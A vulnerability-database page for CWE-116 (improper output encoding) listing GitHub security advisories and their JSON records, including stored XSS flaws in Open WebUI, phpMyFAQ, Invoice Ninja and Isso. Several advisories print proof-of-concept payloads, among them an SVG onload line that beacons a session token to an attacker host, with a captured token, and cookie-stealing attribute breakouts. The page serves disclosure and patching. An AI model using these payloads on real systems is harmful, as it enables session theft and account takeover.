Common Weakness Enumeration

CWE-116

Allowed-with-Review

Improper Encoding or Escaping of Output

Abstraction: Class · Status: Draft

The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.

612 vulnerabilities reference this CWE, most recent first.

GHSA-8WVC-869R-XFQF

Vulnerability from github – Published: 2025-12-04 22:03 – Updated: 2025-12-04 22:03
VLAI
Summary
Open WebUI Vulnerable to Stored DOM XSS via Note 'Download PDF'
Details

Summary

A Stored XSS vulnerability has been discovered in Open-WebUI's Notes PDF download functionality. An attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to execute arbitrary JavaScript code and steal session tokens when a victim downloads the note as PDF.

This vulnerability can be exploited by any authenticated user, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files.

Details

Vulnerability Location

File: src/lib/components/notes/utils.ts
Function: downloadPdf()
Vulnerable Code (Line 35):

const contentNode = document.createElement('div');

contentNode.innerHTML = html;  // Direct assignment without DOMPurify sanitization

node.appendChild(contentNode);
document.body.appendChild(node);

Root Cause

  1. Incomplete TipTap Editor Configuration
  2. Open-WebUI only uses TipTap StarterKit
  3. No Schema definition for dangerous tags like SVG, Script
  4. Unknown HTML tags are stored as raw HTML

  5. Missing Sanitization During PDF Generation

  6. note.data.content.html is directly assigned to innerHTML
  7. No DOMPurify or other sanitization
  8. Stored malicious HTML executes as-is

PoC

Environment

  • Open-WebUI latest version (v0.6.36)
  • Admin account

Step 1: Create Malicious Markdown File

Filename: token_stealer.md

<svg onload="navigator.sendBeacon('https://redacted/steal',localStorage.token)"></svg>

navigator.sendBeacon() was used to bypass CORS.

Step 2: Import to Notes

  1. Login to Open-WebUI
  2. Click "Notes" in the left menu
  3. Drag and drop the Markdown file
  4. Note is automatically created

Step 3: Trigger PDF Download

  1. Access Notes menu (/notes)
  2. Click on the right side of the uploaded note
  3. Select "Download""PDF document (.pdf)"
  4. JavaScript executes

Step 4: Verify Token Theft

Attacker's server log:

POST /steal HTTP/1.1
Host: redacted
Content-Type: text/plain;charset=UTF-8
Content-Length: 145

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjVkMjE4ZmU4LTU2MTktNGEzNS05MWZkLTM2MzA3NDU1NGFkNCJ9.zOicE5c5FJ3ZOc9j6T2xHU-K6dbz-s1ib_hIG4LayFw

And Simple PoC alert(1)

Filename: simple_poc.md

<svg onload="alert(1)"></svg>

image


Impact

CVSS 3.1 Score: 8.7 (High)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Vulnerability Type

CWE-79: Cross-site Scripting (XSS)
CWE-116: Improper Encoding or Escaping of Output

Affected Users

  • All Open-WebUI users
  • Especially users utilizing the Notes feature

Attack Scenario

1. Attacker shares malicious note (.md file) in the community
2. Victim uploads the shared note (.md file)
3. Victim downloads as PDF
4. XSS vulnerability triggers
5. Victim's session (localStorage.token) is stolen

Recommended Patch

// src/lib/components/notes/utils.ts:35
import DOMPurify from 'dompurify';

const contentNode = document.createElement('div');

// Sanitize with DOMPurify
contentNode.innerHTML = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: [
        'p', 'br', 'strong', 'em', 'u', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6',
        'ul', 'ol', 'li', 'a', 'code', 'pre', 'blockquote', 'table', 'thead',
        'tbody', 'tr', 'td', 'th'
    ],
    ALLOWED_ATTR: ['href', 'class', 'target'],
    FORBID_TAGS: ['svg', 'script', 'iframe', 'object', 'embed', 'style'],
    FORBID_ATTR: ['onload', 'onerror', 'onclick', 'onmouseover', 'onfocus'],
    ALLOW_DATA_ATTR: false
});

node.appendChild(contentNode);

References

  • OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
  • DOMPurify: https://github.com/cure53/DOMPurify

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.6.36"
      },
      "package": {
        "ecosystem": "npm",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.6.37"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-65959"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-04T22:03:24Z",
    "nvd_published_at": "2025-12-04T21:16:08Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nA **Stored XSS vulnerability** has been discovered in Open-WebUI\u0027s Notes PDF download functionality. \nAn attacker can import a Markdown file containing malicious SVG tags into Notes, allowing them to **execute arbitrary JavaScript code** and **steal session tokens** when a victim downloads the note as PDF. \n\nThis vulnerability can be exploited by **any authenticated user**, and unauthenticated external attackers can steal session tokens from users (both admin and regular users) by sharing specially crafted markdown files.\n\n## Details\n\n### Vulnerability Location\n\n**File:** `src/lib/components/notes/utils.ts`  \n**Function:** `downloadPdf()`  \n**Vulnerable Code (Line 35):**\n\n```typescript\nconst contentNode = document.createElement(\u0027div\u0027);\n\ncontentNode.innerHTML = html;  // Direct assignment without DOMPurify sanitization\n\nnode.appendChild(contentNode);\ndocument.body.appendChild(node);\n```\n\n### Root Cause\n\n1. **Incomplete TipTap Editor Configuration**\n   - Open-WebUI only uses TipTap StarterKit\n   - No Schema definition for dangerous tags like SVG, Script\n   - Unknown HTML tags are stored as raw HTML\n   \n2. **Missing Sanitization During PDF Generation**\n   - `note.data.content.html` is directly assigned to `innerHTML`\n   - No DOMPurify or other sanitization\n   - Stored malicious HTML executes as-is\n\n\n## PoC\n\n### Environment\n- Open-WebUI latest version (v0.6.36)\n- Admin account\n\n### Step 1: Create Malicious Markdown File\n\n**Filename:** `token_stealer.md`\n\n```markdown\n\u003csvg onload=\"navigator.sendBeacon(\u0027https://redacted/steal\u0027,localStorage.token)\"\u003e\u003c/svg\u003e\n```\n\u003e navigator.sendBeacon() was used to bypass CORS.\n\n### Step 2: Import to Notes\n\n1. Login to Open-WebUI\n2. Click **\"Notes\"** in the left menu\n3. **Drag and drop** the Markdown file\n4. Note is automatically created\n\n### Step 3: Trigger PDF Download\n\n1. Access Notes menu (/notes)\n2. Click **\u22ef** on the right side of the uploaded note\n3. Select **\"Download\"** \u2192 **\"PDF document (.pdf)\"**\n4. JavaScript executes\n\n### Step 4: Verify Token Theft\n\n**Attacker\u0027s server log:**\n```http\nPOST /steal HTTP/1.1\nHost: redacted\nContent-Type: text/plain;charset=UTF-8\nContent-Length: 145\n\neyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjVkMjE4ZmU4LTU2MTktNGEzNS05MWZkLTM2MzA3NDU1NGFkNCJ9.zOicE5c5FJ3ZOc9j6T2xHU-K6dbz-s1ib_hIG4LayFw\n```\n\n### And Simple PoC `alert(1)`\n**Filename:** `simple_poc.md`\n\n```markdown\n\u003csvg onload=\"alert(1)\"\u003e\u003c/svg\u003e\n```\n\u003cimg width=\"1089\" height=\"310\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ded7bb4a-d0e0-4614-8d64-3113c1f79e2f\" /\u003e\n\n\n---\n\n## Impact\n\n**CVSS 3.1 Score: 8.7 (High)**\n\n```\nCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N\n```\n\n### Vulnerability Type\n**CWE-79: Cross-site Scripting (XSS)**  \n**CWE-116: Improper Encoding or Escaping of Output**\n\n### Affected Users\n- **All Open-WebUI users**\n- Especially users utilizing the Notes feature\n\n### Attack Scenario\n```\n1. Attacker shares malicious note (.md file) in the community\n2. Victim uploads the shared note (.md file)\n3. Victim downloads as PDF\n4. XSS vulnerability triggers\n5. Victim\u0027s session (localStorage.token) is stolen\n```\n\n---\n\n## Recommended Patch\n\n```typescript\n// src/lib/components/notes/utils.ts:35\nimport DOMPurify from \u0027dompurify\u0027;\n\nconst contentNode = document.createElement(\u0027div\u0027);\n\n// Sanitize with DOMPurify\ncontentNode.innerHTML = DOMPurify.sanitize(html, {\n    ALLOWED_TAGS: [\n        \u0027p\u0027, \u0027br\u0027, \u0027strong\u0027, \u0027em\u0027, \u0027u\u0027, \u0027h1\u0027, \u0027h2\u0027, \u0027h3\u0027, \u0027h4\u0027, \u0027h5\u0027, \u0027h6\u0027,\n        \u0027ul\u0027, \u0027ol\u0027, \u0027li\u0027, \u0027a\u0027, \u0027code\u0027, \u0027pre\u0027, \u0027blockquote\u0027, \u0027table\u0027, \u0027thead\u0027,\n        \u0027tbody\u0027, \u0027tr\u0027, \u0027td\u0027, \u0027th\u0027\n    ],\n    ALLOWED_ATTR: [\u0027href\u0027, \u0027class\u0027, \u0027target\u0027],\n    FORBID_TAGS: [\u0027svg\u0027, \u0027script\u0027, \u0027iframe\u0027, \u0027object\u0027, \u0027embed\u0027, \u0027style\u0027],\n    FORBID_ATTR: [\u0027onload\u0027, \u0027onerror\u0027, \u0027onclick\u0027, \u0027onmouseover\u0027, \u0027onfocus\u0027],\n    ALLOW_DATA_ATTR: false\n});\n\nnode.appendChild(contentNode);\n```\n\n---\n\n## References\n\n- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n- DOMPurify: https://github.com/cure53/DOMPurify\n\n---",
  "id": "GHSA-8wvc-869r-xfqf",
  "modified": "2025-12-04T22:03:24Z",
  "published": "2025-12-04T22:03:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8wvc-869r-xfqf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65959"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/commit/03cc6ce8eb5c055115406e2304fbf7e3338b8dce"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI Vulnerable to Stored DOM XSS via Note \u0027Download PDF\u0027"
}

GHSA-92HF-4CHR-8HRF

Vulnerability from github – Published: 2022-05-24 17:32 – Updated: 2022-05-24 17:32
VLAI
Details

A flaw was found in Ansible Collection community.crypto. openssl_privatekey_info exposes private key in logs. This directly impacts confidentiality

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-25646"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-10-29T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in Ansible Collection community.crypto. openssl_privatekey_info exposes private key in logs. This directly impacts confidentiality",
  "id": "GHSA-92hf-4chr-8hrf",
  "modified": "2022-05-24T17:32:32Z",
  "published": "2022-05-24T17:32:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25646"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ansible-collections/community.crypto/commit/233d1afc296f6770e905a1785ee2f35af7605e43"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-9525-27VJ-C8R8

Vulnerability from github – Published: 2026-05-06 20:10 – Updated: 2026-06-08 23:58
VLAI
Summary
phpMyFAQ has stored XSS via Utils::parseUrl() in comment rendering
Details

Summary

A stored XSS vulnerability in the comment rendering pipeline allows an authenticated user to inject JavaScript that executes for every visitor of an affected FAQ or News page. An attacker with a registered account can steal admin session cookies and take over the application.

Details

Utils::parseUrl() (phpmyfaq/src/phpMyFAQ/Utils.php, line 281) converts URLs in comment text into clickable <a> tags at render time:

$pattern = '/(https?:\/\/[^\s]+)/i';
$replacement = '<a href="$1">$1</a>';
return preg_replace($pattern, $replacement, $string);

The regex [^\s]+ matches " and <, and the URL is inserted into the href attribute with no htmlspecialchars() call. A URL with a literal " closes the attribute early and allows injecting event handlers like onmouseover.

This only reaches the sink when main.enableCommentEditor is enabled. In that path, comment text goes through sanitizeHtmlComment() instead of FILTER_SANITIZE_SPECIAL_CHARS — which encodes " — so the double-quote survives to storage. The comment is then passed through parseUrl() and rendered via {{ comment.comment|raw }} in comment.macros.twig (line 40), which disables Twig auto-escaping.

The same sink exists in the admin comment panel (admin/content/comments.twig, lines 62 and 112), so admins viewing the panel are also affected.

No Content-Security-Policy headers are set anywhere in the app.

PoC

Requirements: - main.enableCommentEditor = true (set in admin Configuration panel) - attacker has any registered user account - one FAQ entry with comments allowed exists

Steps: 1. Log in as a registered user and open a FAQ with comments. 2. Submit the following as the comment text:

   https://www.evil.com/"onmouseover="alert(document.cookie)

(www. prefix required — parseUrl strips https:// then only re-adds it for www. URLs, which is what triggers the linkification)

  1. Any user who views that FAQ page and hovers the link triggers the payload. To hit an admin, wait for them to visit the page or check the admin comments panel at /admin/content/comments.

Resulting HTML in the page:

<a href="https://www.evil.com/"onmouseover="alert(document.cookie)">
  ...
</a>

The " closes the href attribute; onmouseover becomes a real attribute.

Impact

Stored XSS affecting all visitors of the page, including admins. Session cookie theft leads to full admin account takeover. The payload looks like a normal URL and persists until manually deleted.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "thorsten/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.1.1"
            },
            {
              "fixed": "4.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "4.1.1"
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpmyfaq/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.1.1"
            },
            {
              "fixed": "4.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "4.1.1"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46367"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T20:10:48Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nA stored XSS vulnerability in the comment rendering pipeline allows an authenticated user to inject JavaScript that executes for every visitor of an affected FAQ or News page. An attacker with a registered account can steal admin session cookies and take over the application.\n\n### Details\n\n`Utils::parseUrl()` (`phpmyfaq/src/phpMyFAQ/Utils.php`, line 281) converts URLs in comment text into clickable `\u003ca\u003e` tags at render time:\n\n    $pattern = \u0027/(https?:\\/\\/[^\\s]+)/i\u0027;\n    $replacement = \u0027\u003ca href=\"$1\"\u003e$1\u003c/a\u003e\u0027;\n    return preg_replace($pattern, $replacement, $string);\n\nThe regex `[^\\s]+` matches `\"` and `\u003c`, and the URL is inserted into the href attribute with no htmlspecialchars() call. A URL with a literal `\"` closes the attribute early and allows injecting event handlers like onmouseover.\n\nThis only reaches the sink when `main.enableCommentEditor` is enabled. In that path, comment text goes through `sanitizeHtmlComment()` instead of `FILTER_SANITIZE_SPECIAL_CHARS` \u2014 which encodes `\"` \u2014 so the double-quote survives to storage. The comment is then passed through parseUrl() and rendered via `{{ comment.comment|raw }}` in `comment.macros.twig` (line 40), which disables Twig auto-escaping.\n\nThe same sink exists in the admin comment panel (`admin/content/comments.twig`, lines 62 and 112), so admins viewing the panel are also affected.\n\nNo Content-Security-Policy headers are set anywhere in the app.\n\n### PoC\n\nRequirements:\n- main.enableCommentEditor = true (set in admin Configuration panel)\n- attacker has any registered user account\n- one FAQ entry with comments allowed exists\n\nSteps:\n1. Log in as a registered user and open a FAQ with comments.\n2. Submit the following as the comment text:\n\n       https://www.evil.com/\"onmouseover=\"alert(document.cookie)\n\n   (www. prefix required \u2014 parseUrl strips https:// then only re-adds\n   it for www. URLs, which is what triggers the linkification)\n\n3. Any user who views that FAQ page and hovers the link triggers the\n   payload. To hit an admin, wait for them to visit the page or check\n   the admin comments panel at /admin/content/comments.\n\nResulting HTML in the page:\n\n    \u003ca href=\"https://www.evil.com/\"onmouseover=\"alert(document.cookie)\"\u003e\n      ...\n    \u003c/a\u003e\n\nThe `\"` closes the href attribute; onmouseover becomes a real attribute.\n\n### Impact\n\nStored XSS affecting all visitors of the page, including admins. Session cookie theft leads to full admin account takeover. The payload looks like a normal URL and persists until manually deleted.",
  "id": "GHSA-9525-27vj-c8r8",
  "modified": "2026-06-08T23:58:14Z",
  "published": "2026-05-06T20:10:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9525-27vj-c8r8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46367"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/thorsten/phpMyFAQ"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/phpmyfaq-stored-xss-via-utils-parseurl-in-comment-rendering"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "phpMyFAQ has stored XSS via Utils::parseUrl() in comment rendering"
}

GHSA-95W5-Q9VP-5VRM

Vulnerability from github – Published: 2022-10-24 19:00 – Updated: 2022-10-25 20:22
VLAI
Summary
Heron allows CRLF log injection
Details

Heron versions <= 0.20.4-incubating allows CRLF log injection because of the lack of escaping in the log statements. Please update to version 0.20.5-incubating which addresses this issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.heron:heron-api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.20.5-incubating"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-42010"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-10-25T20:22:49Z",
    "nvd_published_at": "2022-10-24T14:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Heron versions \u003c= 0.20.4-incubating allows CRLF log injection because of the lack of escaping in the log statements. Please update to version 0.20.5-incubating which addresses this issue.",
  "id": "GHSA-95w5-q9vp-5vrm",
  "modified": "2022-10-25T20:22:49Z",
  "published": "2022-10-24T19:00:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42010"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/j65nwr8n7jchngwqptzh100drcr4ry2q"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/10/23/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Heron allows CRLF log injection"
}

GHSA-98WM-CXPW-847P

Vulnerability from github – Published: 2026-03-24 20:40 – Updated: 2026-03-27 21:34
VLAI
Summary
Invoice Ninja Denylist Bypass may Lead to Stored XSS via Invoice Line Items
Details

Vulnerability Details

Invoice line item descriptions in Invoice Ninja v5.13.0 bypass the XSS denylist filter, allowing stored XSS payloads to execute when invoices are rendered in the PDF preview or client portal.

The line item description field was not passed through purify::clean() before rendering.

Steps to Reproduce

  1. Login as any authenticated user
  2. Create or edit an invoice
  3. In a line item description, enter: <img src=x onerror=alert(document.cookie)>
  4. Save the invoice and preview it
  5. The XSS payload executes in the browser

Impact

  • Attacker: Any authenticated user who can create invoices
  • Victim: Any user viewing the invoice (including clients via the portal)
  • Specific damage: Session hijacking, account takeover, data exfiltration

Proposed Fix

Fixed in v5.13.4 by the vendor by adding purify::clean() to sanitize line item descriptions.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "invoiceninja/invoiceninja"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.13.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33628"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-184",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-24T20:40:16Z",
    "nvd_published_at": "2026-03-26T21:17:07Z",
    "severity": "MODERATE"
  },
  "details": "## Vulnerability Details\n\nInvoice line item descriptions in Invoice Ninja v5.13.0 bypass the XSS denylist filter, allowing stored XSS payloads to execute when invoices are rendered in the PDF preview or client portal.\n\nThe line item description field was not passed through `purify::clean()` before rendering.\n\n## Steps to Reproduce\n\n1. Login as any authenticated user\n2. Create or edit an invoice\n3. In a line item description, enter: `\u003cimg src=x onerror=alert(document.cookie)\u003e`\n4. Save the invoice and preview it\n5. The XSS payload executes in the browser\n\n## Impact\n\n- **Attacker**: Any authenticated user who can create invoices\n- **Victim**: Any user viewing the invoice (including clients via the portal)\n- **Specific damage**: Session hijacking, account takeover, data exfiltration\n\n## Proposed Fix\n\nFixed in v5.13.4 by the vendor by adding `purify::clean()` to sanitize line item descriptions.",
  "id": "GHSA-98wm-cxpw-847p",
  "modified": "2026-03-27T21:34:58Z",
  "published": "2026-03-24T20:40:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/invoiceninja/invoiceninja/security/advisories/GHSA-98wm-cxpw-847p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33628"
    },
    {
      "type": "WEB",
      "url": "https://github.com/invoiceninja/invoiceninja/commit/b81a3fc302573fc4a53d61e8537dd19154ce1091"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/invoiceninja/invoiceninja"
    },
    {
      "type": "WEB",
      "url": "https://github.com/invoiceninja/invoiceninja/releases/tag/v5.13.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Invoice Ninja Denylist Bypass may Lead to Stored XSS via Invoice Line Items"
}

GHSA-9F5V-36FP-5CV6

Vulnerability from github – Published: 2022-05-14 03:11 – Updated: 2022-05-14 03:11
VLAI
Details

The PGObject::Util::DBAdmin module before 0.120.0 for Perl, as used in LedgerSMB through 1.5.x, insufficiently sanitizes or escapes variable values used as part of shell command execution, resulting in shell code injection via the create(), run_file(), backup(), or restore() function. The vulnerability allows unauthorized users to execute code with the same privileges as the running application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-9246"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-06-08T01:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "The PGObject::Util::DBAdmin module before 0.120.0 for Perl, as used in LedgerSMB through 1.5.x, insufficiently sanitizes or escapes variable values used as part of shell command execution, resulting in shell code injection via the create(), run_file(), backup(), or restore() function. The vulnerability allows unauthorized users to execute code with the same privileges as the running application.",
  "id": "GHSA-9f5v-36fp-5cv6",
  "modified": "2022-05-14T03:11:18Z",
  "published": "2022-05-14T03:11:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-9246"
    },
    {
      "type": "WEB",
      "url": "https://archive.ledgersmb.org/ledger-smb-announce/msg00280.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9FHH-GQV6-6CP4

Vulnerability from github – Published: 2022-05-02 03:53 – Updated: 2022-05-02 03:53
VLAI
Details

The console in Apache jUDDI 3.0.0 does not properly escape line feeds, which allows remote authenticated users to spoof log entries via the numRows parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2009-4267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-02-19T16:29:00Z",
    "severity": "MODERATE"
  },
  "details": "The console in Apache jUDDI 3.0.0 does not properly escape line feeds, which allows remote authenticated users to spoof log entries via the numRows parameter.",
  "id": "GHSA-9fhh-gqv6-6cp4",
  "modified": "2022-05-02T03:53:12Z",
  "published": "2022-05-02T03:53:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-4267"
    },
    {
      "type": "WEB",
      "url": "http://juddi.apache.org/security.html"
    },
    {
      "type": "WEB",
      "url": "http://mail-archives.apache.org/mod_mbox/juddi-user/201802.mbox/raw/%3C0F272EE1-E2B4-4016-8C5D-F76ABDD12D18%40gmail.com%3E"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9FWW-8CPR-Q66R

Vulnerability from github – Published: 2026-02-24 16:03 – Updated: 2026-02-24 16:03
VLAI
Summary
Isso affected by Stored XSS via comment website field
Details

Impact

This is a stored Cross-Site Scripting (XSS) vulnerability affecting the website and author comment fields. The website field was HTML-escaped using quote=False, which left single and double quotes unescaped. Since the frontend inserts the website value directly into a single-quoted href attribute via string concatenation, a single quote in the URL breaks out of the attribute context, allowing injection of arbitrary event handlers (e.g. onmouseover, onclick).

The same escaping was missing entirely from the user-facing comment edit endpoint (PUT /id/) and the moderation edit endpoint (POST /id//edit/).

Any visitor to a page embedding isso comments is impacted. No authentication or interaction beyond mouse movement is required to trigger a payload — an attacker can post a comment anonymously (moderation is off by default) with a crafted website URL, and the payload persists in the database and fires on every page load. With the full-page invisible overlay technique described in the report, the victim only needs to move their mouse.

Patches

The issue is fixed in commit 3cf27c2. Users should upgrade to a version containing that commit once released. The fix applies html.escape(..., quote=True) to the website field across all three write paths (POST /new, PUT /id/, POST /id//edit/), and adds input validation and escaping to the moderation edit endpoint which previously had neither.

Workarounds

Enabling comment moderation (moderation = enabled = true in isso.cfg) prevents unauthenticated users from publishing comments, raising the bar for exploitation. However, it does not fully mitigate the issue since a moderator activating a malicious comment would still expose visitors. There is no configuration-only workaround that fully prevents the vulnerability.

Resources

  • https://docs.python.org/3/library/html.html#html.escape — note the quote parameter
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "isso"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.13.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27469"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-24T16:03:04Z",
    "nvd_published_at": "2026-02-21T08:16:11Z",
    "severity": "MODERATE"
  },
  "details": "## Impact\n\nThis is a stored Cross-Site Scripting (XSS) vulnerability affecting the website and author comment fields. The website field was HTML-escaped using quote=False, which left single and double quotes unescaped. Since the frontend inserts the website value directly into a single-quoted href attribute via string concatenation, a single quote in the URL breaks out of the attribute context, allowing injection of arbitrary event handlers (e.g. onmouseover, onclick).\n\nThe same escaping was missing entirely from the user-facing comment edit endpoint (PUT /id/\u003cid\u003e) and the moderation edit endpoint (POST /id/\u003cid\u003e/edit/\u003ckey\u003e).\n\nAny visitor to a page embedding isso comments is impacted. No authentication or interaction beyond mouse movement is required to trigger a payload \u2014 an attacker can post a comment anonymously (moderation is off by default) with a crafted website URL, and the payload persists in the database and fires on every page load. With the full-page invisible overlay technique described in the report, the victim only needs to move their mouse.\n\n## Patches\n\nThe issue is fixed in commit 3cf27c2. Users should upgrade to a version containing that commit once released. The fix applies html.escape(..., quote=True) to the website field across all three write paths (POST /new, PUT /id/\u003cid\u003e, POST /id/\u003cid\u003e/edit/\u003ckey\u003e), and adds input validation and escaping to the moderation edit endpoint which previously had neither.\n\n## Workarounds\n\n  Enabling comment moderation (moderation = enabled = true in isso.cfg) prevents unauthenticated users from publishing comments, raising the bar for exploitation. However, it\n  does not fully mitigate the issue since a moderator activating a malicious comment would still expose visitors. There is no configuration-only workaround that fully prevents\n   the vulnerability.\n\n## Resources\n\n  - https://docs.python.org/3/library/html.html#html.escape \u2014 note the quote parameter",
  "id": "GHSA-9fww-8cpr-q66r",
  "modified": "2026-02-24T16:03:04Z",
  "published": "2026-02-24T16:03:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isso-comments/isso/security/advisories/GHSA-9fww-8cpr-q66r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27469"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isso-comments/isso/commit/0afbfe0691ee237963e8fb0b2ee01c9e55ca2144"
    },
    {
      "type": "WEB",
      "url": "https://docs.python.org/3/library/html.html#html.escape"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isso-comments/isso"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Isso affected by Stored XSS via comment website field"
}

GHSA-9GQ4-2485-Q63Q

